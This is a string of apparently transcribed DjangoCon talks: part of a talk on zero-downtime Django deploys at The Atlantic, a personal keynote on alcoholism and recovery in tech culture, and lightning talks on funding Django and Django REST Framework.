could take 30 seconds, 45 seconds. And during that period of time, all these requests are queuing up. And basically the server, by the time the server is responding, it's still being overwhelmed by requests. And there were a few times where we had to do like rolling restarts of our server and actually bring them down and take them out of rotation and nginx just that they could kind of cool off and be able to respond again. So what he suggested was, why don't you, rather than having like a stage and a live that are separate and, you know, doing the switch basically like at the deploy time, load the code and touch the whizgy first and then switch the simlinks. Basically have like A and B sim link to stage and live so that you have the A and the B folders are always production ready. In any given case, one of them is either one version ahead or one version behind what's currently on production. So in every other respect, the CDN path that they're using, the database, they're production. You force as much code as possible to load before defining your def application in your whizgy file. This is less important for modwhizgy, but we switched to uwhizgy. And one of the things that's nice when you're using uwhizgy and you set up, again, with the sort of silly names for Python and Django projects, is the Zerg mode where you have like the way Zerg mode works. You have a Zerg server which is really very bare bones. All it does is it just like listens for workers. And then the Zergs, when they come online, they communicate to the Zerg server that they are accepting requests. And it's only at that point that the Zerg server routes requests to them. So this gives them the freedom to sort of, you know, take as long as they need basically to get everything loaded up into memory and preload everything before it even needs to deal with the incoming requests. And the Zerg server handles the queue. And then before swapping the upstream, after they've been preloaded, we warm them up with a number of simultaneous concurrent HTTP requests that basically make sure that all the workers get a request with a cache busted URL so that they're all primed. So why did we switch from modwhizgy to uwhizgy? There's, I think, a lot of misinformation about whiskey servers and, you know, performance benchmarks and things like that. I think generally the comparisons and the configurations aren't very reliable. And the thing being tested often doesn't apply to the real world. There's something like how many concurrent hello world responses can you serve up at any given moment? Modwhizgy in general, it's comparable to performance, like I said. It runs on Apache HTTP server, which is, you know, whatever. Mostly the work of a single developer. The documentation is terminally out of date. The configuration options are missing or only discoverable on the release notes, which is something that's openly admitted in the documentation. Kind of like the summary of the GitHub pages kind of demonstrates the balance between where the community's gone with modwhizgy and uwhizgy. So uwhizgy brought an active community, very thorough documentation. In fact, it's kind of overwhelming, but also highly configurable. And so when I was rehearsing this talk, there were a couple slides that I don't think I'm going to have time to get through. But I do have a GitHub repository which has some demo code that kind of demonstrates how we're using uwhizgy emperor mode and Zerg mode. And the uwhizgy stats server to kind of monitor our whizgy applications, preload everything using a fabric script. So, you know, I'll just sort of reference everyone, refer everyone to that and sort of as a teaser kind of show what our uwhizgy monitoring page looks like. So it looks something like this. We use emperor mode. Emperor mode basically is a way where you can dynamically set up multiple configurations for a single code base. We have like one really large code base that hosts all the Atlantic properties, City Lab, the wire, the Atlantic.com. We have a profile site which is for people to manage their print subscriptions. We have a sponsored section of the site. And we have an A and a B version of all those things. And then also we have a CMS that's for our editors and a CMS called Waldo that's for outside video contributors. So we go to this page. We can see in real time as requests come in. Here we go. It sort of changes. You can sort of hover over the little dots to see information that's pulled from the uwhizgy stats server. If the site starts to get overwhelmed, there's a little cue monitor down at the bottom. Generally if the cue fills up a little bit, that's normal. That's sort of expected. And we have one of the things you can do with the Zerg mode is dynamically spin up instances based on how busy the other worker processes are. So when these requests come in, it spawns new processes and then it's able to handle the increased volume that's coming in. So up here, these are the URLs to the GitHub repository. I actually haven't pushed it yet, but by the time this video is online, it'll be there. I think it'll probably be sometime later this week. At Frankie Dentino, I don't really use Twitter much, but it's an easy way to get hold of me or you can email me Frankie at theatlantic.com. And with the time I have left, I'll open it up to any questions. Great talk. Thank you. So the question is basically all end user traffic that hits theatlantic.com served through CDN, but then that CDN is basically talking to Django across the board. So is the entire site served off of Django? I guess it's the high level question. Yeah, well, mostly. I mean, there are a couple of really, really random legacy pages that look really old and they are really old, but 99% of the traffic goes through Django. And like home page and like all the way through the Catholic rate. Yeah, and as far as the CDN is concerned, so a small portion of the requests will get through the CDN. You know, we generally have about a three minute page cache for every page, and then we have longer ones for some, you know, older pages that haven't been updated in a while. But most of the requests that get passed that are actually bots and crawlers. We have an archive, I mean, we've been printing since 1857, and we basically have everything online that we have the rights to. You would think that a print magazine would have digital publishing rights to all their articles, but you would be wrong. That is not the case. But everything that we do have the rights to and that we've digitized is free online. So, you know, we don't generally have an issue when people crawl our site if they're doing it in good faith. But occasionally there's like an AWS instance that'll make like 200 concurrent requests every second and sort of makes our servers melt. And so we have to kind of scramble to block it. And so a lot of this was like kind of dealing with that and getting us in a place where we could handle those sorts of situations without breaking a sweat. Great. Thank you. Hi. So you talked about using modWizki and switching over to Uwizki. There's a third option that a lot of people use, which is G Unicorn. I was just wondering if you thought about G Unicorn and didn't go with it or just didn't have time and you had seen how big Uwizki was. Do you have an opinion on that? I don't actually. I know people have had a lot of success with it. I don't really have a strong opinion one way or the other. Just kind of Uwizki worked for us, but I think it's on from what I understand G Unicorn is on par with Uwizki in terms of features and performance. So you didn't look at Unicorn and decide like, oh, that's not going to work for us. No. Okay. Thanks. Sure. Yeah. You mentioned earlier that you thought some ARM caching was kind of a mixed bag. Can you go into more detail why you think so? Sure. Yeah. So when we ran Django Cache Machine for a really long time on our site and then actually kind of accidentally returned it off. And this wasn't the first time we've accidentally turned off caching. But in this case, there was really no performance difference. And we kind of speculated about why that might be. And the conclusion we came to is that a lot of the like, so our situation is maybe unique because we're not on the same page. We're unique because we're not in the cloud. We're in a data center. It's all, you know, in rest in Virginia, all like connected via fiber channel. So there's not much latency between the servers and the database. And the database is pretty well tuned for reads because we don't have a lot of rights because we're, you know, the editors publish maybe 20 stories a day versus people reading millions of stories a day. So the database is generally not a bottleneck for us. And the model instantiation and hydration and basically the unpickling and creating of the model instances was taking almost as much time as if we were doing it raw or M queries to the database. So it really didn't make a big difference. But I think that in cases where you're like on a cloud where there's latency between your application servers and your database servers, or when you have situations where you like writes and reads are more balanced, then I think there might be a, like I said, a mixed bag, then it might be useful. Thank you. Thank you.
|
One year ago we completed a years-long project of migrating theatlantic.com from a sprawling PHP codebase to a Python application built on Django. Our first attempt at a load-balanced Python stack had serious flaws, as we quickly learned. Since then we have completely remade our stack from the bottom up; we have built tools that improve our ability to monitor for performance and service degradation; and we have developed a deployment process that incorporates automated testing and that allows us to push out updates without incurring any downtime. I will discuss the mistakes we made, the steps we took to identify performance problems and server resource issues, what our current stack looks like, and how we achieved the holy grail of zero-downtime deploys.
|
10.5446/32703 (DOI)
|
Come on, y'all! I tend to be a little loud and do some wild gesticulations, so please bear with me if I go a little overboard or I'm a little loud. But I do want to start with a content warning and a trigger warning right up front. This talk is going to discuss alcohol and drug use and some frank sexual discussions. Nothing gratuitous. But these conversations really aren't easy when we're talking about a progressive deadly disease and that's what addiction is. So if you're uncomfortable, please don't hesitate to leave at any point. I don't want anyone to feel uncomfortable and I will not be offended. So without further ado. So I'm Tim. As Mikhail said, I'm an IT director of advanced initiatives at the Word and School for Word and Research Data Services. You can find me everywhere as Flipper PA. I'm a Pythonista in Django Nut. I'm a DjangoCon organizer. I'm the Wharton liaison. I'm a fun-loving nerd, a hockey fan and a guitarist. And I'm also an alcoholic addict in recovery. I'm really glad to be here today. In recovery, we take one day at a time. I truly believe to bookend Saran's talk that we are all extremely lucky to get paid to do what we love. For some context, this talk was first given at Bar Camp Philly in a slightly different form, which is a highlight of my year last November. And I want to get it right out that being an addict is just part of what makes me me. This disease can really affect everybody. In recovery, we say from Yale to jail. But here, in Philadelphia, I like to modify that. From state pen to Penn State. And there will be some laughs in this as well. So feel free to laugh at my high school and college fashion choices as we go through. But it is a serious topic. And chances are there are a fair number of people struggling with this disease here today. Now, I should have said spoiler alert in the last keynote before I shared this part of the story about Simon. But I grew up with two loving parents and a little sister, hi, Marianna. Both my parents are academics, foreign language teachers, and I had a thing for computer languages. So again, I consider myself extremely lucky and privileged. I was really born on third base in baseball terms. I lived here in University City. I went to St. Mary's Nursery School growing up, which is the JangoCon childcare provider. We provide childcare. And had a pretty normal middle class childhood. My godfather, Uncle Charlie, was actually quite a computer scientist. In 1974, the year I was born, he wrote a book called An Introduction to the Theory of Computing. And was the guy who wrote the assembly code on the chip of the memory game Simon that you can see behind me. So I remember being very young, being around computers, eight inch floppy disks double-sided back in the day. And it wasn't long. My dad brought home a computer when I was seven and IBM PC 88 with two five and inch quarter full height floppy drives. And soon after that, I got my own computer when I was about 12. And soon after that started a BBS, which is what we did before the internet existed. We dialed up to one another. It was called Wellen and Swight Dragon. And I still remember the number. It was 215-879-1682. I often wonder if the people who have that number now actually still get the dial up, the horrible, so, you know, I had a pretty very, very, very lucky privileged upbringing. Fast forward to when I was 12. I left my comfort zone of University City and my parents moved out toward the suburbs. And I had never really felt like I fit in at school or anywhere. And this is a recurring theme you'll hear amongst addicts. You know, my computer was my best friend in many ways. My BBS was getting pretty popular. And I met a lot of other local BBSers, including some of the programmers behind the BBS system I used at the time, the Phoenix BBS. Unfortunately, at about that age, I was abused by one of the older programmers when I was 13. I completely hid it for many, many years. And this is part of what kind of started a cycle of shame and hiding things from people for many, many years. I started drinking and smoking marijuana in high school. And because of this, I started to feel like I belonged in social circles really for the first time. We didn't have meetup groups back then for computer geeks. Dungeons and Dragons was about one of my few social outlets. So it was difficult. And we fast forward to college. Feel free to laugh. Little new to me, I was a prime candidate to become an alcoholic addict. I started drinking and doing drugs every day. And this was about the same time I began to open up about the abuse I had gone through. So I was exploring, like many of us do in college. And alcohol and drugs helped me be social. I was popular and accepted for the first time ever. I wasn't always the greatest student, but I'd always loved computers. So I was heavily invested in my major. And got heavily involved in the early internet and the web. I started a site called FillingMusic.com in the mid-90s, which was the first organized local music scene on the web, which eventually grew into a PHP MySQL site after starting with server-side includes the height of technology at the time. And somehow I managed to graduate on time, which was another start of something called denial because I couldn't be an alcoholic. I graduated on time. I did well with my customized computer science degree that put together computer science and psychology or how I like to refer to them now. How to mess with people's heads, part A and part B. I was convinced I'd grow out of it someday. I was just being young. So I did the logical thing and I moved to Jacksonville, Florida to get away from it all for a job. Jacksonville is the worst place on the planet. There is absolutely no diversity down there. The tech scene was horrible, but it did manage to clean me up a little bit. But the drinking was always there. The drinking hung on. I got off, you know, I stopped doing some of the harder drugs I'd gotten into by that point. But the drinking and the socializing, it was still such a crutch for me to be able to socialize with people, to be able to break down the barriers, to be able to talk to other people, to be accepted by people. At the bar, that's why people do drink so often is because if you think about it, and misrepresentation was referenced in our last talk, there's another great documentary called The Mask You Live In done by the same directors and film producers, which talks about how men are taught to suppress their emotions from a very young age. If you're age five and you're crying in public, it's a problem. And if you're crying at age 10, watch out. We are trained to do this from the time we grow up. And it's to the detriment of all of us. Now think about guys at the bar. It's the one time they'll say things like, oh, I love you, bro. Love you. Or, you know, actually cry or open up about their emotions. This addiction cycle is partially, I believe, responsible because of how much we suppress our emotions and don't have actual conversations about what we are feeling, what we are doing, and it affects both men and women. Moving on to my career, CD Now, great place to work. It was a great place to start, but they had beer on tap in the tech department and lots of drinking. So of course, you know, the location once again had to be my drinking problem. It couldn't be Philadelphia. It couldn't be Jacksonville. It couldn't be the company I was at. It had to be me, but I was still in denial about it being the place I was at. So I thought a bank would be a more straight-laced place to work. I was incorrect. It was an interesting start-up of a bank. I actually got to design a bank for David Bowie, which I had a Bowie card for a little while. I kind of looked like William Shatner and kind of acted like William Shatner and kept a bottle of vodka in my desk back in the tech department that he would pop off to have a sip from during board meetings. So it was really not a great place for an alcoholic to work. But you know, we talk about there being a lot of alcoholism in the tech industry, but then I think about it. We also talk about there being a lot of drinking and lawyers, construction. I mean, is there an industry that doesn't have it? Maybe if you're a door-to-door Mormon religion salesman, that might be the one. But really, there is a heavy drinking culture in every industry. It's not just tech. We are just at a higher risk because of the behaviors that we tend to engage in. So I started my own companies. I've started two companies and taken them to sale. The first one, Digital Content Solutions, got bought up by a local company called Crompco that not only had beer on tap, they had a Jaeger machine in the garage. So literally every stop I had until Wharton had a very, very heavy drinking culture. Now, I'm not blaming the companies. Tech just has this culture, which is literally a petri dish for addiction. It's filled with temptations for alcoholics and addicts at every turn. We used to back at CDNOW before going to an all-you-can-eat Chinese buffet. We were translating the site for many different languages, and we would have an Afghani translation meeting at about 11.30 a.m. on Fridays where we would smoke pot in the parking lot and then go to an all-you-can-eat Chinese buffet, do the math. We got our money's worth. But alcoholism has followed me despite all these changes of scenery. It's my disease to own. And I clearly was not growing out of drinking. I had been pretty successful, which gave me a big form of denial. My career in technology, I worked in tech and on the Philly tech scene since 1996. I started three companies taking two-to-sales, I mentioned. I started the SLCC, the Second Life Community Convention, in 2005, which became the biggest virtual world's convention in the world. I served as the vice president of PANMA, the Philadelphia Area New Media Association. If you're from the Philadelphia area, I highly recommend checking it out. And I was also the co-chair of Bar Camp Philadelphia, which is still the largest and most active bar camp in the nation, as well as helping run the Wharton Web Conference right here. I was a contributor to open source projects. And the funny thing is, if anybody treated me the way I was treating myself at the time, I'd be in prison for murder. Alcohol-fueled creativity is such a total myth. Every hack-a-thons at bars, I've done it. You know, James Joyce said, write drunk edit sober, and we had modified that to co-drunk debug sober. It's really total BS. This myth of the rock star programmer is one that just needs to die, because for me, everything became a reason to drink. A promotion at work, a friend got a raise, a business deal got done. Drink. A problem at work, a friend got fired, a business deal did not go through. Drink. Coworkers are going out. Drink. Death in the family. Drink. My nephew was born. Drink. I was drinking when I found out my nephew was born. I was having a party. I missed his first birthday because I was hungover. I called my family and said I was too sick to go. Little did I know I was actually telling the truth then. I was sick. I have a disease. It's a deadly, progressive disease. The second birthday, I was in rehab and I wrote him a letter because my uncle has this disease and just celebrated 30 years sober. I have this disease. I do not know if my nephew is going to get this disease, but I do want to have a conversation with him at some point about it. And no, he can always talk about me. The shame continued to build. I was successful, but I was in denial. After every flyer season, our local hockey team ended, I would try to take a month off from drinking with varying degrees of success. So Brené Brown is a professor at the University of Houston's Graduate School of Social Work, and she is considered a leading researcher on shame. I've become a big fan since I've been in recovery. Shame is one of the most primitive emotions, and no one wants to talk about it. And shame can quietly marinate over a lifetime. So here are some of her quotes on shame. I think shame is deadly, and I think we are swimming in it deep. The less you talk about it, the more you got it. Shame depends on buying into the belief that you are alone. Shame cannot survive being spoken. Shame cannot survive empathy. Empathy and altruism are absolute keys to a strong community, and the amount I've witnessed here at DjangoCon and within the Django community is absolutely amazing. The fact we can have these conversations, these absolutely wonderful conversations that are difficult but need to happen, as Russ showed us last year with his talk on depression, are ones we must have to really have a healthy community. Let's consider the stigma around alcoholism for a moment. I can have a beer lunch, right? It is Friday. Look at the table. Would you smoke in front of a cancer patient? You blacked out because you were wasted. That was hilarious. Would you think it was hilarious if somebody with Alzheimer's didn't recall something? These are diseases. Why don't you just try beer? No hard stuff. Yeah, because addicts are obviously great with limits. The stigma makes it really hard for people with this disease to get help. It is not a question of willpower any more than you can will another disease to go away. I avoided recovery for years after knowing I had a problem because of the whole God thing, which was just an excuse. I told you about taking a month off after the flyers were eliminated from the play house. That was one of multiple attempts to stop. Really just another form of denial. Oh, I can stop for a couple of weeks. I must not be an alcoholic. That said, I will take this disease over any other. I don't have cancer. I don't have AIDS. My medicine is that I get together with a bunch of friends for an hour and talk about my biggest problem and my favorite subject, me. So some uncomfortable facts to consider. One in six Americans binge drink four more times a month by CDC estimates, and that number is higher in technology circles. For me, it became daily or every other day. I'd party all weekend long, sometimes into money. I'd be the one planning the party after work. Happy hour with coworkers. They'd go home like normal earthlings. I'd go on to the dirtiest, dingiest dive bar I could find in South Philly. Eating often became an afterthought. When you start getting text messages from bartenders at 7.05 a.m. on a Saturday saying you're late, that's what's known as a hidden indicator. It might be time to get help. Excessive drinking costs America $255 billion in crime, medical care, and lost productivity annually. You know, I'd avoid missing work because that might mean I'm an alcoholic. I've also always loved what I do. So I really threw myself into my career as a way to justify my bad behavior by saying, oh, I've got a full-time job. I'm doing well at work. That was the one thing I could hang on to that would get me through. I made sure to keep up appearances and always perform. I made calendar appointments in my phone so I didn't forget anything. One in every 10 Americans over the age of 12 is addicted to alcohol or drugs, roughly equal to the entire population of Texas. This is why it's so important that we have these conversations. I drank heavily from the age of 18 to 40. This disease is deadly and progressive, and there is help out there. So of that population the size of Texas, only 11% ever received treatment. My sobriety date is April 12, 2015. It was the last day of Picon 2015. I saw a talk by Jacob Kaplan-Miles called the Talent Myth, talking about the myth of the Rockstar developer. An amazing talk. Go watch it on YouTube after we're done here. It's really an absolutely must watch for everybody on the planet, let alone our community. This helped put me, I'm not saying Jacob Kaplan-Miles got me sober. What I am saying is that it put me in the right mindset so that I had had a great week at Picon but involved a lot of heavy drinking. Jacob's talk put me in the right mind frame that when I came back from Picon the next morning my family was gathered in my living room knowing that the flyers had just been eliminated from the playoffs and I was about to embark on my yearly attempt at a month off. I was in the right mindset for what they had to say. And I entered rehab and it's probably the best decision I ever made, other than maybe asking my wife to marry. So some uncomfortable facts to consider continue. 23 million Americans self-identify as being in recovery from drug or alcohol addiction. 23 million. That's a lot of this country. And worldwide, do the math. I got away from everything for a month and started to build my recovery experience toolbox, the experience toolbox of how to handle situations. I was worried about leaving my colleagues up the river without a paddle in the lurch. You know what's funny? Believe it or not, the world kept spinning without me at work. It was absolutely incredible. I wouldn't have believed it. But there are really no excuses to get the help you need. It will make your life so much better. It was Lou Gehrig who said, today I consider myself the happiest man, the luckiest man in the world. Today, I really do consider myself the luckiest person in the world. So really, if you have a problem, please reach out to me or somebody else. It'll be kept confidential. We can talk. There's some uncomfortable facts in DjangoCon terms. There are about 450 attendees here at DjangoCon. We sold out. Great work, Jeff and the whole team. Approximately 45 of those people are addicted to alcohol or drugs and are actively using. Approximately five will receive treatment and I am one of those five. Let's examine our culture and community a little bit. Programming and startup culture, we've heard it many times here already. How many companies have you seen with beer on tap, a bar, micro brews in the fridge, offered as a perk? People in technology are already at high risk for alcoholism and addiction. The obsessive compulsive behavior is celebrated and it's all around us. Digital design and tech in general has a culture of promoting alcohol use. Drinks are capable of having a few drinks and stopping. They absolutely have that right. For those of us who cannot stop where one drink is too many and there's never enough, it's really a temptation we have to remove. I used to say things like, oh, I'm not a problem drinker. I'm a solutions drinker. I don't drink to have a good time. I drink to stop but voices in my head. Turns out those voices are your friends sometimes. Conscience, motivation, empathy, they get buried under the sea of addiction you're swimming in. So our culture encourages heavy drinking as a way of socializing networking and business. I sold one of my companies in a bar. There are a fair number of us who can't just stop, which leads us on a destructive path. When alcohol becomes a perk of the workplace, we risk alienating people in the quest for cool. This is unacceptable. The stigma of this disease will often present people who have a problem from expressing it. It did for me for many years. There are quite literally people who should be at this event who are not here because of this disease. I want you to meet Nick D. Nick was my rehab roommate at the Melbourne Institute Rehab in April 2015 during detox. It's about the lowest point you could imagine in life filled with shame. So it does create a bond between roommates who are going through detox together. Sort of a in the bunker foxhole mentality. Again we weren't best friends but we had been doing well in early recovery. Seeing each other at alumni nights back at the rehab every Tuesday night we'd go back even very early on to show people that there is hope who are currently in there. I saw Nick on Tuesday, October 20th, 2015 at Melbourne alumni night and he seemed to be doing really well. We were about six months in at the time. On Monday, October 26th, a couple days before I gave the stock for the first time, Nick revaps overdosed and died at age 24. This is a deadly progressive disease and it needs to be addressed. So what can we do? Get professional help if you have a problem. Recognize the stigma. Tell a friend to get professional help and intervention can save a life even if it doesn't work the first time. Don't be afraid to talk about it. These topics have to be on the table. Care instead of mockery, empathy not judgment. Don't celebrate this disease. Sentiments like work hard, play hard are bullshit. What are we, kindergartners? Oh, you get to go for recess. You worked hard today. Examine your work culture. Penn, Wharton and my boss are absolutely amazing and supported me in every way to get the help I need. Without any shame, I've had nothing but support. Can we say that about many other workplaces? Again, I'm not here to tell any earthlings who can drink responsibly to stop drinking. I believe in having fun and absolutely insist on enjoying life, but if you're like me, you'll know you have a problem. And if you think you have a problem, please, please get help. Reach out to me. I will talk to any of you about this. That is part of my medicine is helping another alcoholic or addict get the help they need. It helps keep me sober. So the miracle. I have a daily reprieve from the urge to drink. I reach out to other alcoholics and try to help them. And in doing so, I help myself. I've been sober on my birthdays for the first time since before Nirvana's Never Mind was released. I've had more honest laughter and joy in my life than I've had in 22 years of addiction. I get to spend a ton of time with my nephew watching him grow up. He's three and lives five blocks from me. I actually enjoy being myself again. It's a miracle. So I'm going to close with this. Yesterday is history. Tomorrow is a mystery. Today is a gift. That's why we call it the present. Be sure you do something nice for someone else today. And by the way, if they find out, it doesn't count. Altruism is its own reward. And it's the key to recovery. It's helping another alcoholic or addict out. Every day isn't perfect. I strive for progress, not perfection. I am really lucky that there is a solution to my disease. And once again, I get to hang out with a bunch of my close friends who are like I am and talk about my favorite topic and biggest problem, me, almost every day, if not twice a day. And life is good. So I really want to thank the Django community for providing a platform where we can talk about the really important issues. If there is an issue of any type you want to bring up, the Django community is a place that will embrace it. And that is one of our greatest strengths. Put the technology aside. Come for the technology. Stay for the community. That's all of you. That's everyone here and everyone across the world. It's one of the most amazing communities I've ever been a part of. I give a talk on how Wharton found Django. And I talk about all the technical things. And we went through analyzing what kind of plug-in ecosystem does it have that put out of the ORM work. And at the end of it, I talk about how damn lucky we got by landing on such an amazing tech community. The Django community and the Python community have been absolutely amazing in embracing Wharton as we've moved to Python and Django as our framework and language of choice. And you know, everybody who supported me, the Django community, my wonderful colleagues, my friends and my family, the warmth has been great. The lack of judgment has been amazing. The understanding of the fact that I have to put significant time into recovery has been amazing. But most importantly, I can now say, hi, I'm Tim, and I'm an alcoholic, and thanks for letting me share. Thank you. Thanks so much, heartwarming. If anybody has any comments or anything they'd like to share, we've got a couple of minutes before lunch. And thanks so much. I think I'll just say for everyone, thank you so much for sharing, and thank you so much for telling us your story. Thanks, Russ. Hi, Tim. Hey, Alex. Do you think communities where they serve alcohol and that's kind of a normalized thing are uninclusive to people who are recovering from alcoholism? It's like, I mean, I'm a vegan and sometimes it bothers me when people around me are eating meat and makes me feel a little bit uncomfortable. I'm wondering if that's sort of the same thing, like if you feel uncomfortable when people around you are drinking. It does when it's really the focus of an event, but for me, it's very different than maybe any other alcoholic or addict. So some alcoholics and addicts have different triggers. I am not okay when the focus of an event is the bar, the alcohol. And I was partially responsible for leading those kinds of events before, unless I sound like a total hypocrite when I was in my act of addiction. But things like the Monday night bowling night, where it is not the focus and people are having drinks, I'm okay with that. Not every alcoholic and addict will be. But I think the key here is to find a balance because I don't know of any alcoholics or addicts who want everybody to stop drinking because we have a problem. Again, we're a small part of the population, but we do exist. And as a vegetarian, I can relate, but I was very glad to see DjangoCon once again showing how amazing it is. A tagged vegetarian vegan table yesterday. Thank you, Ryan Sullivan and Alex for putting that together. It's just another example of how amazing and inclusive this community really is. I completely agree. Thank you, Tim. Thanks, Alex. Thank you, Tim, for a really amazing and honest talk. I know that some of us here work at companies that do have the beer on tap and do have sort of a heavy drinking culture. Do you have any tips about how we can approach the people in power in our workplaces to maybe at least remove the kegerator? Yeah, sometimes it's hard because it's so entrenched in the culture. My last company, for example, was a very blue-collar, rough-and-tumble, man-up type of community. So it's a very difficult thing to broach, depending on the context. But I think more and more at this topic, it gets talked about. It gets easier and easier, especially with things like YouTube where you can find all kinds of resources or the statistics I quoted here when you actually put them out there. I think there are a lot of people who just don't realize how large a problem this is. However, it's getting a lot of attention. And the problems we're having with opiate addiction in this country now, especially with companies that have promoted opiates as non-addicting, OxyContin in particular, has gotten a lot of attention. And while that's a very sad story, when you hear stories about senior citizens who are a copping heroin because they can't afford their opiates anymore, and the way the effect opiates have had on the suburbs is not something that they can sweep under the rug anymore. So I think it's getting noticed a lot more. So there are a lot more resources out there, and the conversation has started, which has made me proud to be in recovery. Thanks, Lacey. All right. I think it's lunchtime. I'm going to go listen to some very loud music in the data center for a few minutes, but I'll be up there to see you all soon. Thanks so much. Heartwarming. You all are amazing and awesome. Thank you, DjangoCon. Thank you.
|
Technology professionals have been in high demand for several decades, and this demand for talent has caused a culture to emerge that often turns a blind eye to those who may be struggling with alcoholism and addiction. We have to come together to avoid this "petri dish" continuing to exist, by watching out for ourselves, and one another. The CDC estimates that ten percent of Americans suffer from the disease of addiction, and only nine percent of addicts ever receive treatment. This "petri dish" of technology culture makes it even harder for those of us with careers in the field. Recovery can be a wonderful journey for those of us who suffer from the disease, and I hope by sharing some of my journey, people will take a step back and consider what we can do to improve the culture for everyone. Content warnings: this will be frank discussion that may involve colorful language, and topics including drug and alcohol abuse, death from addiction and sexual abuse.
|
10.5446/32707 (DOI)
|
Come on, y'all! Okay, so who in here is playing Pokemon Go and you're willing to admit it? Okay, who's gotten anything like really cool they want to lift up? Like this morning driving here there was a Venusaur like in the wild. I was like what, has anybody gotten anything really cool? No? Yeah? Okay. Yeah, awesome. Alright, cool. Well let's play together because I still haven't battled yet and I'm like level eight now. Alright, so hi everyone. I'm Adrienne. You can find me on Twitter at Adriennefriend. I am Django's director of advancement. What? What does that mean? So Django project has two paid contractors, me and Tim Graham. You probably are more familiar with Tim's work. He is the one who makes Django Go. Do you know about the Django Software Foundation? The DSF is the non-profit that's behind Django, that administers Django. We're run by a board of directors, Frank Wiles, Daniella, who organized Django Con Europe last year, James Bennett, Karen Tracy, Rebecca Conley is our new secretary, and Kristoff is our treasurer. I work really closely with him. And then there are the two of us, your Django staff. This is Tim getting your issues. That's actually how he gets them. And me, just the two of us. So the DSF is the non-profit behind Django and our main focus is the direct support of Django's developers. This means organizing and funding sprints. We often sponsor the sprints at conferences. Helping folks attend the sprints. Getting to a conference is expensive, so we provide grants for that. We provide financial assistance to Django girls. We fund the Django Fellowship Program, which is Tim's work. That's Tim trying to make something close to a real developer salary, making Django happen. So here's a little bit of Tim's work at a glance, just based on what I pulled down from our recent posts about his work. He does a lot. Before we contracted with Tim officially about a year ago, as of February, releases just happen when they happen. Tim keeps them on a regular schedule, and he keeps the community updated about what's happening. He's a hugely valuable asset to us. You want some more, you can join the Django developers mailing list and get his weekly updates about what he's working on. In February, he was renewed for another six months of funding until September of this year, and he would love to keep going, but we need the funding to make it happen. We also want to keep making a difference for Django girls. In Django Girls Poland last year, we supported them four times, and they said that when they approached different local companies about their workshops, the companies didn't really understand why it was important, but the DSF made it possible. So there are some ways you can get involved, and we need you. Yes, you. In this storm, we need you. There are some different ways you can get involved. You can become a corporate member. If your company is built with Django, if you use Django, show support to Django as a corporate member. There are three levels of membership, silver, gold, and platinum. There are tons of benefits, including badges that you can put on your website. That's something that the community had been asking for for a while, and we made happen. So I just want to give a shout out to some of our current corporate members. There are three slides, so take a look. Look and see if you see your company on here. If you don't see your company on these slides, we need to talk. Let's talk. A few more. A few more. Were you up there? Let's talk. All right. Now, this is something everyone can become. You can become a leadership level donor. This is a big commitment to Django when you think about it. You're just giving $1,000 or more per year in a calendar year. You get a logo or a picture on our main fundraising page, which is what everyone goes to, and you get a special badge that you can use wherever you like. So leadership level donations may seem big, but the cool thing is that they can be recurring. We make it easy to give on a schedule. So if you give $100 a month to Django for a year, you become a leadership level donor. So why not do that? We have a number of folks in our community who do that, and you can sign up right on our website, making a monthly, quarterly, or yearly donation. We also run special campaigns. Right now, we have a partnership with JetBrains and PyCharm. You can get PyCharm at 30% off, and they're going to make that donation for every purchase that we make. They're going to make a donation to Django, so take care of that, that I donate to Django. So I want to finish up my lightning talk here with a challenge, a pretty big audacious challenge. One of those, not one of those. So this is where we're currently standing when I pulled this slide down like an hour ago. We're 34.5% funded. We're at nearly 69,000 donated of our yearly goal of 200,000, and that's composed of 231 donors. I want us to get to 100K. We're more than halfway through the year. Our goal is 200,000. Let's get to 100,000 by the close of sprints on Friday. Let's book these corporate memberships. Let's make our personal commitments to Django, and let's grow that heart to 50% full by the end of this week. And if that sounds a little nutty to you, keep in mind we've done this before. When we launched in January of 2015, in six days, this community gave $30,000 in six days. So that's what we're doing. Let's make it happen, and let's say in touch. Thanks. I am the very model of a modern Django model for my handle any even emoji and cuneiform. I can't look at nada, can be accessed through an elegant and mature omen. Some criticize the white space in my language with a lot of scorn, but when you are quite used to this, you probably think you are as easy as a norm, while building sites you'll probably end up building lots and lots of views. To service all the shopping carts and sometimes even read the news. The design assets will be safely stored out there in static files. The pretty is completed by the use of some cascading styles, but while I'm out there handling all that emoji and cuneiform, I'm still the very model of a modern Django model. My models can be entered into any modern database, but really you should use Postgres like anybody with good taste. Atomic transactions can let me handle failures with good grace. I-18N and L-18N can run in any place. I-18N can be used to escape by default, help stop all the egg on face, and future errors are prevented with a sturdy testing base, but nothing can protect you from a dev-hop who is feeling smug. Who edits in production and then introduces nasty bugs. And that's why you all should have a comprehensive monitoring scheme, alerting to activities of hackers who are being mean. Yet still I'm out there handling all that emoji and cuneiform because I am the model of a modern Django model. Hopefully you can use me any way that you are wanting to, with comprehensive documents to assist when you have no clue, supported by a friendly group of worldwide Django users who gladly volunteer their time for mentoring and helping you. Whether building up migrations or figuring out a class-based view, or deploying a server on a platform that is very new, I have no doubt that with their help your lovely brand new site will soar. And if you have enough bugs you may find yourself joining the course. Some people want to dump me and are looking for the next cool thing, yet I am quite excited for the features 1.10 will bring. But still I am quite busy handling emoji and cuneiform because I am the model of a modern Django. So many more, many more, many more, many more! Okay, you are sensing the theme here? Okay, so my name is Tom Christie, I am the author of Django REST Framework. And thank you. I want to spend a few minutes talking about the collaborative funding model that we have recently launched. Before I start, can I ask everybody in the room, if you or the company that you work for uses Django REST Framework in some capacity, can you? Oh, wow, okay. And if you or the company that you work for currently funds one of the REST Framework pay plans, can you put your hand up please? Okay. That's what needs to change. So here's the good news. Yeah, a few weeks back I quit my regular employment and started working on REST Framework full time. The result of this so far, there's a huge slew of bugs and tickets that have been closed. We've had the 3.4 release out just last week, complete with Schema Generation, the Python client library for interacting with your APIs. And the command line tool for interacting with your APIs. And this functionality is also going to start to open up a lot of other interesting possibilities as it matures. And there's an absolute huge stack of work that is coming next on top of this as well. So there's going to be hypermedia support coming up. I have plans for real time support using WebSockets coming up. More mature authentication defaults in REST Framework to help you build more secure APIs, helping you get into production faster by providing templates that allow you to get your API up and running and in production in next to no time. What else? So client libraries in hopefully, you know, as we go forward, JavaScript, perhaps Go, Java, Swift. Improved tooling for API documentation, as well as monitoring, debugging, all sorts of things that we can work on. I can see, you know, there's at least two or three person years worth of work that I can already see from here. So I can't do this without your help. And I think the core thing that I want to say about this talk is trying to make the business case for funding, whether it's or, you know, hopefully both 